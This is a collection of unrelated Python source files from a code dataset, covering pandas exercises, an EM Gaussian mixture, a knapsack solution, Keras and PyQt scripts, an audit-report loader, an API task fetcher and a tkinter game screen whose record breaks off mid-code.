> 2010:\r\n break \r\n temp_df['year'] = year\r\n ssa_df_list.append(temp_df)\r\nfinaldf = pd.concat(ssa_df_list, axis = 0, ignore_index = True)\r\n\r\n#task 02: Display the top 5 male and female baby names of 2010.\r\n\r\ndf_2010 = finaldf[finaldf['year'] == 2010]\r\nfemale_names = df_2010[df_2010['sex'] == 'F']\r\nfemale_names_sort_by_count = female_names.sort_values('count', ascending = False, ignore_index = True)\r\n\r\nprint (female_names_sort_by_count['names'][0:5]) \r\n\r\nmale_names = df_2010[df_2010['sex'] == 'M']\r\nmale_names_sort_by_count = male_names.sort_values('count', ascending = False, ignore_index = True)\r\n\r\n#top five female names of 2010\r\nprint (male_names_sort_by_count['names'][0:5]) \r\n\r\n#task 03: Calculate sum of the births column by sex as the total number of births \r\n#in that year(use pandas groupby method).\r\n\r\ngrouped_multiple = finaldf.groupby(['year', 'sex']).agg({'count': ['sum']})\r\nprint(grouped_multiple)\r\n\r\n#task 04: Plot the results of the above activity to show total births by sex and year.\r\n\r\ngrouped_multiple.plot(kind='bar')\r\ngrouped_multiple[0:10].plot(kind='bar')\r\n\r\n","sub_path":"Day24_code_challenge.py","file_name":"Day24_code_challenge.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"561128582","text":"# coding=utf-8\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.stats import multivariate_normal\n\ndef make_data():\n mean_1 = [1,1]\n mean_2 = [4,4]\n mean_3 = [1,4]\n cov1 = [[0.1,0],[0,0.1]]\n cov2 = [[0.2,0],[0,0.2]]\n cov3 = [[0.6,0],[0,0.6]]\n arr1 = np.random.multivariate_normal(mean_1, cov1, 100)\n arr2 = np.random.multivariate_normal(mean_2, cov2, 50)\n arr3 = np.random.multivariate_normal(mean_3, cov3, 50)\n figure, ax = plt.subplots()\n ax.set_xlim(left=-4, right=8)\n ax.set_ylim(bottom=-4, top=8)\n for i in range(len(arr1)):\n plt.plot(arr1[i][0], arr1[i][1], 'b--', marker='+', color='r')\n for i in range(len(arr2)):\n plt.plot(arr2[i][0], arr2[i][1], 'b--', marker='o', color='g')\n for i in range(len(arr3)):\n plt.plot(arr3[i][0], arr2[i][1], 'b--', marker='*', color='b')\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.plot()\n plt.title(\"sample\")\n #plt.show()\n return np.vstack((arr1, arr2, arr3))\n\ndef updatePhi(w):\n n1 = len(w)\n phi=np.zeros(n1)\n for i in range(n1):\n sum = 0\n n2 = len(w[i])\n for j in range(n2):\n sum = sum + w[i][j]\n phi[i] = sum/n2\n return phi\n\ndef updateW(data,w,phi,mu,sigma):\n n1=len(w) # 3\n n2 = len(w[0]) # 200\n var = []\n for k in range(n1):\n var.append(multivariate_normal(mean=mu[k].tolist(), cov=sigma[k].tolist()))\n\n for j in range(n2):\n sum = 0\n for i in range(n1):\n sum = sum + var[i].pdf(data[j])*phi[i]\n for i in range(n1):\n w[i][j] = var[i].pdf(data[j])*phi[i]/sum\n\ndef updateMu(data,w,mu):\n changed=False\n n1 = len(w) # 3\n n2 = len(w[0]) # 200\n for i in range(n1):\n sumW = 0.0\n sumX = np.array([0.0,0.0])\n for j in range(n2):\n sumW = sumW + w[i][j]\n sumX = sumX + w[i][j]*data[j]\n mu_new = sumX / sumW\n if np.dot(mu_new-mu[i],mu_new-mu[i]) > 0.001:\n changed = True\n mu[i] = mu_new\n return changed\n\ndef updateSigma(data,w,mu,sigma):\n n1 = len(w) # 3\n n2 = len(w[0]) # 200\n sum=np.array([[0,0],[0,0]])\n for i in range(n1):\n sumW = 0.0\n sumX = np.array([0.0,0.0])\n for j in range(n2):\n sumW = sumW + w[i][j]\n z0 = np.array([data[j] - mu[i]])\n z0T = np.array([data[j] - mu[i]]).transpose()\n sumX = sumX + w[i][j]*np.dot(z0T, z0)\n sigma[i] = sumX/sumW\n\ndef classify(data,mu,sigma):\n n1=len(w) # 3\n n2 = len(w[0]) # 200\n var=[]\n for k in range(n1):\n var.append(multivariate_normal(mean=mu[k].tolist(), cov=sigma[k].tolist()))\n\n figure, ax = plt.subplots()\n ax.set_xlim(left=-4, right=8)\n ax.set_ylim(bottom=-4, top=8)\n\n for i in range(n2):\n tmp_arr=np.array([])\n for j in range(n1):\n tmp_arr=np.append(tmp_arr,var[j].pdf(data[i]))\n index = tmp_arr.argmax()\n if index == 0:\n plt.plot(data[i][0], data[i][1], 'b--', marker='+', color='r')\n elif index == 1:\n plt.plot(data[i][0], data[i][1], 'b--', marker='o', color='g')\n elif index == 2:\n plt.plot(data[i][0], data[i][1], 'b--', marker='o', color='b')\n plt.xlabel(\"x1\")\n plt.ylabel(\"x2\")\n plt.title(\"result\")\n plt.plot()\n plt.show()\n\nif __name__ == \"__main__\":\n # 1 make data\n classN=3\n data=make_data()\n n=len(data)\n for k in range(n):\n w = np.array([np.zeros(n), np.zeros(n), np.zeros(n)])\n # w = array[classN][n] =array[3][200]\n for i in range(classN):\n for j in range(n):\n w[i][j]= 1.0/classN\n\n phi=updatePhi(w)\n mu = np.array([[6.0, 6.0], [4.0, -1.0], [-2.0, 2.0]])\n sigma=np.array([[[0.1,0],[0,0.1]],[[0.1,0],[0,0.1]],[[0.1,0],[0,0.1]]])\n\n # 2 training\n while True:\n updateW(data,w,phi,mu,sigma)\n updatePhi(w)\n updateSigma(data,w,mu,sigma)\n changed = updateMu(data,w,mu)\n if changed == False:\n print(\"迭代完成\")\n break\n\n # 3 show\n print(\"mu=\",mu,\", sigma=\",sigma)\n classify(data,mu,sigma)\n\n print(\"hello\")\n\n#迭代完成\n#mu= [[ 4.00729834 3.99848889]\n# [ 1.01089497 1.05225006]\n# [ 0.92949217 4.18380895]] ,\n#sigma= [[[ 0.23196114 -0.01896477]\n# [-0.01896477 0.17165715]]\n#\n# [[ 0.10205901 0.00157192]\n# [ 0.00157192 0.11477843]]\n#\n# [[ 0.7010517 0.04783335]\n# [ 0.04783335 0.51147277]]]","sub_path":"unsupervised_learning/src/MixturesGaussians.py","file_name":"MixturesGaussians.py","file_ext":"py","file_size_in_byte":4098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"208296757","text":"\ndef func(n, m : str) -> list :\n list = []\n min = 2000000.0\n rem = []\n answer = []\n for i in range(len(n)):\n for j in range(i+1, len(n)) :\n list.append([n[i], n[j]])\n for x in range(int(m)):\n for i in range(len(list)):\n tmp = (int(list[i][0]) / int(list[i][1]))\n if min > tmp:\n min = tmp\n rem = list[i]\n answer = rem\n list.remove(rem)\n min = 2000000.0\n return answer\nn = input().replace(\"[\",\"\").replace(\"]\",\"\").replace(\" \",\"\").split(\",\")\nm = input()\nlist = func(n,m)\nl = []\nfor i in range(len(list)):\n l.append(int(list[i]))\nprint(l)","sub_path":"Code/CodeRecords/2634/61041/285848.py","file_name":"285848.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"452082277","text":"import re\nimport csv \nfrom texttable import *\nimport asciitable\n\nclass ProgramData():\n \"\"\"Container class for program data output\"\"\"\n program = \"\"\n #version = \"\"\n #entries = []\n\n def __init__(self):\n self.data = dict()\n \n def as_rst(self, table, pad_char=\" \", width=4):\n \"\"\"Convert asciitable to rst table\"\"\"\n s = \".. table::\"\n data = self.data[table].draw()\n s = s + [ pad_char * width + data[x] for x in data ]\n return s\n\n def _sniff_table(self,filename):\n \"\"\"Read all lines in a table. If header starts with a space, add a description\"\"\"\n re_space = re.compile(\"^\\s+\\S+\")\n fp = open(filename)\n lines = fp.readlines()\n fp.close()\n i = 0\n for l in lines:\n match = re_space.match(l)\n if match:\n lines[i] = \"rowname\" + lines[i]\n continue\n i = i + 1\n return lines\n\n def read_table(self, infile, comment_char=\"#\", delimiter=\"\\t\", header=True, na_char=\"NA\"):\n table = Texttable()\n first = True\n with open(infile) as fp:\n rows = csv.reader(fp, delimiter=delimiter)\n for row in rows:\n if first:\n ncol = len(row)\n cwidth = [0 for x in range(ncol)]\n if header and first:\n table.header(row)\n else:\n if len(row) < ncol:\n row = row + [na_char for x in range(0,ncol-len(row))]\n table.add_row(row)\n first=False\n for i in range(len(row)):\n if len(row[i]) > cwidth[i]:\n cwidth[i] = len(row[i]) + 1\n\n table.set_cols_width(cwidth)\n table.set_cols_align([\"l\"] + [\"r\" for x in range(1,ncol)])\n fp.close()\n return table\n","sub_path":"scilife/scilife/report/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"298898642","text":"# Uses python3\nimport sys\n\n'''\nFind a way how to pack maximum value into a limited capacity.\n'''\ndef get_optimal_value(capacity, weights, values):\n\n res = order_as_most_valuable(weights, values)\n total = 0\n for i in res:\n if i[1] <= capacity:\n total += i[0]\n capacity -= i[1]\n else:\n total += (i[0] / i[1]) * capacity\n capacity = 0\n\n if capacity == 0:\n break\n return total\n\n\ndef order_as_most_valuable(weights, values):\n bits = {}\n value_per_kilo = []\n for i in range(0, len(weights)):\n avg = values[i] / weights[i]\n value_per_kilo.append(avg)\n bits[avg] = (values[i], weights[i])\n\n value_per_kilo.sort(reverse=True)\n return [ bits[x] for x in value_per_kilo]\n\n\nif __name__ == \"__main__\":\n data = list(map(int, sys.stdin.read().split()))\n n, capacity = data[0], data[1]\n values = data[2:(2 * n + 2):2]\n weights = data[3:(2 * n + 2):2]\n opt_value = get_optimal_value(capacity, weights, values)\n print(\"{:.10f}\".format(opt_value))\n","sub_path":"c1w3l6/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"47308184","text":"import os\nimport h5py\nimport cv2\nimport numpy as np\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras import optimizers\nfrom keras.models import Sequential\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D\nfrom keras.layers import Activation, Dropout, Flatten, Dense\nfrom keras.optimizers import SGD\nfrom os.path import join, getsize\nimport sys\nfrom mcc_multiclass import multimcc, confusion_matrix\n\n\ndef load_im2(paths):\n l = []\n for name in paths:\n result = cv2.imread(name)\n im2 = cv2.resize(result, (224, 224)).astype(np.float32)\n im2[:,:,0] -= 103.939\n im2[:,:,1] -= 116.779\n im2[:,:,2] -= 123.68\n im2 = im2.transpose((2,0,1))\n #im2 = np.expand_dims(im2, axis=0)\n #print(im2.shape)\n l.append(im2)\n return l\n\n\n# path to the model weights files.\nweights_path = 'vgg16_first_training_raspberry_weights.h5'\n\n# dimensions of our images.\nimg_width, img_height = 224, 224\n\n\nvalidation_data_dir = 'datasets/so3/'\n\n\n# build the VGG16 network\nmodel = Sequential()\nmodel.add(ZeroPadding2D((1, 1), input_shape=(3, img_width, img_height)))\n\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(64, 3, 3, activation='relu', name='conv1_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(128, 3, 3, activation='relu', name='conv2_2'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(256, 3, 3, activation='relu', name='conv3_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv4_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_1'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_2'))\nmodel.add(ZeroPadding2D((1, 1)))\nmodel.add(Convolution2D(512, 3, 3, activation='relu', name='conv5_3'))\nmodel.add(MaxPooling2D((2, 2), strides=(2, 2)))\n\nmodel.add(Flatten(input_shape=model.output_shape[1:]))\nmodel.add(Dense(256, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(3, activation='sigmoid'))\n\n# load the weights of the VGG16 networks\n# (trained on ImageNet, won the ILSVRC competition in 2014)\n# note: when there is a complete match between your model definition\n# and your weight savefile, you can simply call model.load_weights(filename)\n\nassert os.path.exists(weights_path), 'Model weights not found (see \"weights_path\" variable in script).'\nmodel.load_weights(weights_path)\nprint('Model loaded.')\n\n# build a classifier model to put on top of the convolutional model\n\n# note that it is necessary to start with a fully-trained\n# classifier, including the top classifier,\n# in order to successfully do fine-tuning\n#top_model.load_weights(top_model_weights_path)\n\n\n# set the first 25 layers (up to the last conv block)\n# to non-trainable (weights will not be updated)\nfor layer in model.layers[:25]:\n layer.trainable = False\n\n# compile the model with a SGD/momentum optimizer\n# and a very slow learning rate.\nmodel.compile(loss='binary_crossentropy',\n optimizer=optimizers.SGD(lr=1e-4, momentum=0.9),\n metrics=['accuracy'])\n\n\nvalidation_images = os.listdir(validation_data_dir)\nvalidation_images.sort()\n\nfor i in range(len(validation_images)):\n validation_images[i] = validation_data_dir + validation_images[i]\n\n\nvalidation = np.array(load_im2(validation_images))\n\npredicted_labels = model.predict(validation)\npredicted_labels_linear = []\n\nprediction_summary = open(\"vgg16_first_train_raspberry_prediction_new.csv\", \"w\")\nprediction_summary.write(\"\\t\".join(['FILENAME', 'PREDICTED_LABELS', 'E', 'G', 'L'])+'\\n')\n\n\nfor i in range(len(predicted_labels)):\n cls_prob = predicted_labels[i]\n predicted_labels_linear.append(np.argmax(cls_prob))\n if predicted_labels_linear[i] == 0:\n predicted_label = \"Early\"\n elif predicted_labels_linear[i] == 1:\n predicted_label = \"Good\"\n elif predicted_labels_linear[i] == 2:\n predicted_label = \"Late\"\n line = [validation_images[i], predicted_label, str(round(cls_prob[0],3)), str(round(cls_prob[1],3)), str(round(cls_prob[2],3))]\n\n prediction_summary.write(\";\".join(line)+\"\\n\")\n prediction_summary.flush()\n\nprediction_summary.flush()\nprediction_summary.close()\n","sub_path":"vgg16_raspberry_predict_new.py","file_name":"vgg16_raspberry_predict_new.py","file_ext":"py","file_size_in_byte":5041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"27790567","text":"# coding:utf-8\nfrom PyQt5.QtWidgets import QMainWindow, QPushButton , QWidget , QMessageBox, QApplication, QHBoxLayout\nimport sys\n\n\nclass WinForm(QWidget):\n def __init__(self, parent=None):\n super(WinForm, self).__init__(parent)\n button1 = QPushButton('Button 1', self)\n button2 = QPushButton('Button 2', self)\n\n button1.clicked.connect(lambda: self.onButtonClick(1)) # 正则表达式里调用了该类函数,并传递了参数\n button2.clicked.connect(lambda: self.onButtonClick(2))\n\n layout = QHBoxLayout()\n # layout.addStretch(1)\n layout.addWidget(button1)\n layout.addWidget(button2)\n\n self.setLayout(layout)\n self.setGeometry(300, 300, 300, 300)\n self.show()\n\n def onButtonClick(self, n):\n print('Button {0} 被按下了'.format(n))\n QMessageBox.information(self, \"信息提示框\", 'Button {0} clicked'.format(n))\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = WinForm()\n sys.exit(app.exec_())\n","sub_path":"Code/PyQtDev/signal_slot_lambda_param.py","file_name":"signal_slot_lambda_param.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"130031241","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jun 21 12:38:45 2019\r\n\r\n@author: LGC0069\r\n\"\"\"\r\n\r\nimport numpy as np\r\n#import tkinter.ttk as ttk\r\n#from GUI import *\r\n#rt = ttk.Tk()\r\n#gui = CoreGUI(rt)\r\n\r\nimport pandas as pd\r\nimport pyodbc\r\nfrom datetime import datetime\r\nimport datetime as dt\r\n\r\n\r\ndef load_data(server, dat) :\r\n \r\n cnxn = pyodbc.connect('DRIVER={SQL Server};UID=LGC0069;WSID=LGC-5CG62446DY;Trusted_Connection=Yes;SERVER='+server+';DATABASE='+dat)\r\n \r\n \r\n \r\n query1 = \"SELECT [Name],[UnitCode],[UnitClassification] FROM Unit\"\r\n query2 = \"SELECT [UnitCode],[AuditYear],[CreateDatetime],[IntergovernmentalSourceCode] FROM UnitDetail\"\r\n\r\n\r\n df = pd.read_sql(query1, cnxn)\r\n df = df.drop_duplicates()\r\n \r\n df1 = pd.read_sql(query2, cnxn)\r\n df1 = df1.loc[df1['AuditYear']==2018]\r\n df1 = df1.drop_duplicates()\r\n\r\n df = pd.merge(df,df1,how = 'right', on='UnitCode')\r\n df = df.drop_duplicates(subset={'UnitCode','AuditYear','IntergovernmentalSourceCode'})\r\n df['CreateDatetime']=df['CreateDatetime'].astype('datetime64[ns]')\r\n df = df.loc[(df['UnitClassification'].isin(['A','B']))]\r\n df = df.loc[df['IntergovernmentalSourceCode'] == 'AFIR']\r\n df = df.sort_values('Name')\r\n df_out = df['Name'].str.upper()\r\n print('finished loading names')\r\n \r\n return df_out\r\n\r\n\r\ndef load_report() :\r\n \r\n cy = 2018\r\n fy = cy - 2\r\n years = range(fy,cy + 1)\r\n \r\n\r\n \r\n audit_sub_dt = np.array([])\r\n yrs = np.array([])\r\n names = np.array([])\r\n\r\n\r\n \r\n \r\n for y in years :\r\n \r\n aud = pd.read_excel('L:Unit Adm. Documents/'+str(y)+' Unit Audit Assignment Log.xlsx', \r\n sheet_name = 'Assignment Log', skiprows=1)\r\n aud = aud.loc[aud['Unit Type'].isin([50,51]),{'Unit Name', 'Date Report submitted in Portal '}]\r\n aud['Unit Name'] = aud['Unit Name'].str.upper()\r\n late = dt.date(y,12, 1)\r\n never = dt.date(y+1,6,30)\r\n \r\n munics = aud['Unit Name']\r\n for munic in munics : \r\n print(munic)\r\n aus = aud.loc[aud['Unit Name'] == munic, 'Date Report submitted in Portal '].values\r\n \r\n if isinstance(aus[0], datetime) :\r\n print('dt')\r\n aus = aus[0].date()\r\n elif isinstance(aus[0], np.datetime64) :\r\n print('np')\r\n ts = (aus[0] - np.datetime64('1970-01-01T00:00:00Z')) / np.timedelta64(1, 's')\r\n aus = datetime.utcfromtimestamp(ts).date()\r\n else :\r\n print(aus[0])\r\n aus = aus[0]\r\n #aus = dt.parse(str(aus[0]))\r\n if aus == datetime.utcfromtimestamp(0) or aus == '#N/A' or aus == '' or isinstance(aus, float) :\r\n audit_sub_dt = np.append(audit_sub_dt, [0])\r\n elif aus > late and aus < never : #submit date after 6/30/next year\r\n audit_sub_dt = np.append(audit_sub_dt, [0.5]) \r\n elif aus > never :\r\n audit_sub_dt = np.append(audit_sub_dt, [0]) \r\n else:\r\n audit_sub_dt = np.append(audit_sub_dt, [1])\r\n\r\n names = np.append(names, [munic])\r\n yrs = np.append(yrs, [y])\r\n \r\n\r\n print(y)\r\n \r\n subs = pd.DataFrame({'Municipality': names, 'AuditYear':yrs, 'Audit Submitted':audit_sub_dt,})\r\n subs = subs.pivot(index = 'Municipality', columns='AuditYear', values='Audit Submitted')\r\n \r\n\r\n\r\n return subs\r\n\r\n#df = load_data('SQLMSCP3','SLG_Reporting')\r\nout = load_report()\r\nout.to_csv('~/Documents/Projects/Municipal Systems/Data/Audit_Submit_History.csv')\r\n\r\n\r\n#ts = (aus[0] - np.datetime64('1970-01-01T00:00:00Z')) / np.timedelta64(1, 's')\r\n\r\n#datetime.utcfromtimestamp(ts)","sub_path":"Shill_Portfolio/Projects/Municipal Systems/Audit_Submit_3Years.py","file_name":"Audit_Submit_3Years.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"245459023","text":"current_users = ['GRABIELcruz', 'francisANDREA', 'luisdavid', 'pedro', 'luissebastian']\nnew_users = ['alfredo', 'grabielcruz', 'arguello', 'francisandrea', 'LUISDAVID']\n\ntest_current_users = []\ntest_new_users = []\n\nfor current_user in current_users:\n test_current_users.append(current_user.lower())\n\nfor new_user in new_users:\n test_new_users.append(new_user.lower())\n\nfor new_user in test_new_users:\n if new_user in test_current_users:\n print(new_user + ' is already been taken')\n else:\n print(new_user + ' is available. You can use it')\n\n","sub_path":"chap05/current_user.py","file_name":"current_user.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"137845639","text":"#!/usr/bin/python3\n\"\"\"\nThis scripts reads an API and stores the data\n\"\"\"\nimport requests\nimport sys\n\n\ndef main():\n \"\"\"\n Python script to read information from a public API\n returns employess an their completed tasks\n \"\"\"\n number = sys.argv[1]\n url_user = \"https://jsonplaceholder.typicode.com/users/{}\".format(number)\n url_tasks = (\"https://jsonplaceholder.typicode.com/users/{}/todos\".\n format(number))\n response = requests.get(url_tasks)\n tasks = response.json()\n user_info = requests.get(url_user).json()\n employee_name = user_info[\"name\"]\n list_of_done_tasks = [x for x in tasks if x['completed']]\n number_of_done_tasks = len(list_of_done_tasks)\n total_task_number = len(tasks)\n print(\"Employee {} is done with tasks({}/{}):\".format(employee_name,\n number_of_done_tasks,\n total_task_number))\n for task in list_of_done_tasks:\n print(\"\\t {}\".format(task[\"title\"]))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"0x15-api/0-gather_data_from_an_API.py","file_name":"0-gather_data_from_an_API.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"168692597","text":"import urllib.request\nimport shutil\n\ndef downloadfile(url,filename):\n with urllib.request.urlopen(url) as response, open(filename, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n\nif __name__ == '__main__':\n url = \"http://cdn.knmi.nl/knmi/map/page/klimatologie/gegevens/maandgegevens/mndgeg_344_tg.txt\"\n filename = \"data/mndgeg_344_tg.txt\"\n downloadfile(url, filename)","sub_path":"energie/updatetemp.py","file_name":"updatetemp.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"242565532","text":"from classes import *\nfrom tkinter import *\nfrom tkinter import ttk\nimport time\n\n\n\n\njugador=crear_capitanes(1,5,\"Oro1\")\npreguerrero=jugador.equipo_guerreros[0]\nguerrero=preguerrero[0]\n\nenemigo=crear_capitanes(1,5,\"Plata1\")\npreguerrero1=enemigo.equipo_guerreros[0]\nguerrero1=preguerrero1[0]\n\n\n\ncomando_consola=0\n\n\n\n\n\n\t\n\n\ndef combate(suGuerrero,miGuerrero):\n\n\t\n\tglobal texto_pantalla\n\tglobal comando_consola\n\tglobal jugador\n\tglobal enemigo\n\n\tcomando_consola=0\n\n\troot=Tk()\n\tw=860\n\th=720\n\tws=root.winfo_screenwidth()\n\ths=root.winfo_screenheight()\n\tx=(ws/2)-(w/2)\n\ty=(hs/2)-(h/2)\n\t\n\troot.title(\"Fight&Run\")\n\troot.iconbitmap(\"espiral.ico\")\n\troot.geometry(\"%dx%d+%d+%d\" % (w,h,x,y))\n\n\ttexto_pantalla= StringVar()\n\n\tfoto_enemigo=PhotoImage(file=suGuerrero.foto)\n\tfoto_jugador=PhotoImage(file=miGuerrero.foto)\n\n\tframe_combate=Frame(root)\n\tframe_combate.config(bg=\"blue\")\n\tframe_combate.pack(fill=\"both\",expand=True)\n\n\t\t\n\n\n\n#---------------------------------Enemigo--------------------------------\n\n\tfotoguerreroenemigo=Label(frame_combate,image=foto_enemigo)\n\tfotoguerreroenemigo.grid(row=0, column=5,pady=5,padx=5,rowspan=4)\n\n\tframe_infoenemigo=Frame(frame_combate,width=300,height=300)\n\tframe_infoenemigo.config(bg=\"red\")\n\tframe_infoenemigo.grid(row=0, column=3,pady=5,padx=5,columnspan=2,rowspan=4)\t\n\n\tvaloracionguerreroenemigo=Label(frame_infoenemigo,text=\"{}\".format(suGuerrero.devuelve_valoracion()))\n\tvaloracionguerreroenemigo.config(font=(\"Arial Black\",22))\n\tvaloracionguerreroenemigo.grid(row=0,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\tnombreguerreroenemigo=Label(frame_infoenemigo,text=\"{}\".format(suGuerrero.nombre))\n\tnombreguerreroenemigo.config(font=(\"Arial Black\",15))\n\tnombreguerreroenemigo.grid(row=1,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\ttipoenemigo=Label(frame_infoenemigo,text=\"{} Lv:\".format(suGuerrero.tipo))\n\ttipoenemigo.grid(row=2,column=0,sticky=\"e\")\n\ttipoenemigo.config(font=(\"Arial\",9))\n\n\tnivelenemigo=Label(frame_infoenemigo,text=\" {}\".format(suGuerrero.nivel))\n\tnivelenemigo.config(font=(\"Arial Black\",12))\n\tnivelenemigo.grid(row=2,column=1,sticky=\"w\")\n\n\tatributosenemigo=Label(frame_infoenemigo,text=\"Atributos:\")\n\tatributosenemigo.config(font=(\"Arial\",11))\n\tatributosenemigo.grid(row=3,column=0,columnspan=2)\n\n\tinfoatributos1enemigo=Label(frame_infoenemigo,text=\"Ataque: {}\\n\\nDefensa: {}\".format(suGuerrero.ataque,suGuerrero.defensa))\n\tinfoatributos1enemigo.config(font=(\"Arial\",11))\n\tinfoatributos1enemigo.grid(row=4,column=0,rowspan=2,pady=2,padx=2)\n\n\tinfoatributos2enemigo=Label(frame_infoenemigo,text=\"{}/{} hp \\n\\n{}/{} mp\".format(suGuerrero.vida_actual,suGuerrero.vida,suGuerrero.mana_actual,suGuerrero.mana))\n\tinfoatributos2enemigo.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\tinfoatributos2enemigo.config(font=(\"Arial\",11))\n\n\tinforarezaenemigo=Label(frame_infoenemigo,text=\"{}\".format(suGuerrero.rareza))\n\tinforarezaenemigo.grid(row=6,column=0,columnspan=2,pady=2,padx=2)\n\tinforarezaenemigo.config(font=(\"Arial Black\",12))\n\n#---------------------------------Jugador--------------------------------\n\n\n\tfotoguerrerojugador=Label(frame_combate,image=foto_jugador)\n\tfotoguerrerojugador.grid(row=4, column=0,pady=5,padx=5,rowspan=4)\n\n\n\tframe_infojugador=Frame(frame_combate,width=300,height=300)\n\tframe_infojugador.config(bg=\"red\")\n\tframe_infojugador.grid(row=4, column=1,pady=5,padx=5,columnspan=2,rowspan=4)\t\n\n\tvaloracionguerrerojugador=Label(frame_infojugador,text=\"{}\".format(miGuerrero.devuelve_valoracion()))\n\tvaloracionguerrerojugador.config(font=(\"Arial Black\",22))\n\tvaloracionguerrerojugador.grid(row=0,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\tnombreguerrerojugador=Label(frame_infojugador,text=\"{}\".format(miGuerrero.nombre))\n\tnombreguerrerojugador.config(font=(\"Arial Black\",15))\n\tnombreguerrerojugador.grid(row=1,column=0,sticky=\"s\",columnspan=2)\n\t\n\n\ttipojugador=Label(frame_infojugador,text=\"{} Lv:\".format(miGuerrero.tipo))\n\ttipojugador.grid(row=2,column=0,sticky=\"e\")\n\ttipojugador.config(font=(\"Arial\",9))\n\n\tniveljugador=Label(frame_infojugador,text=\" {}\".format(miGuerrero.nivel))\n\tniveljugador.config(font=(\"Arial Black\",12))\n\tniveljugador.grid(row=2,column=1,sticky=\"w\")\n\n\tatributosjugador=Label(frame_infojugador,text=\"Atributos:\")\n\tatributosjugador.config(font=(\"Arial\",11))\n\tatributosjugador.grid(row=3,column=0,columnspan=2)\n\n\tinfoatributos1jugador=Label(frame_infojugador,text=\"Ataque: {}\\n\\nDefensa: {}\".format(miGuerrero.ataque,miGuerrero.defensa))\n\tinfoatributos1jugador.config(font=(\"Arial\",11))\n\tinfoatributos1jugador.grid(row=4,column=0,rowspan=2,pady=2,padx=2)\n\n\tinfoatributos2jugador=Label(frame_infojugador,text=\"{}/{} hp \\n\\n{}/{} mp\".format(miGuerrero.vida_actual,miGuerrero.vida,miGuerrero.mana_actual,miGuerrero.mana))\n\tinfoatributos2jugador.grid(row=4,column=1,rowspan=2,pady=2,padx=2,sticky=\"w\")\n\tinfoatributos2jugador.config(font=(\"Arial\",11))\n\n\tinforarezajugador=Label(frame_infojugador,text=\"{}\".format(miGuerrero.rareza))\n\tinforarezajugador.grid(row=6,column=0,columnspan=2,pady=2,padx=2)\n\tinforarezajugador.config(font=(\"Arial Black\",12))\n\n#---------------------------------Display--------------------------------\n\n\tframe_display=Frame(frame_combate,width=300,height=500)\n\tframe_display.config(bg=\"red\")\n\tframe_display.grid(row=4, 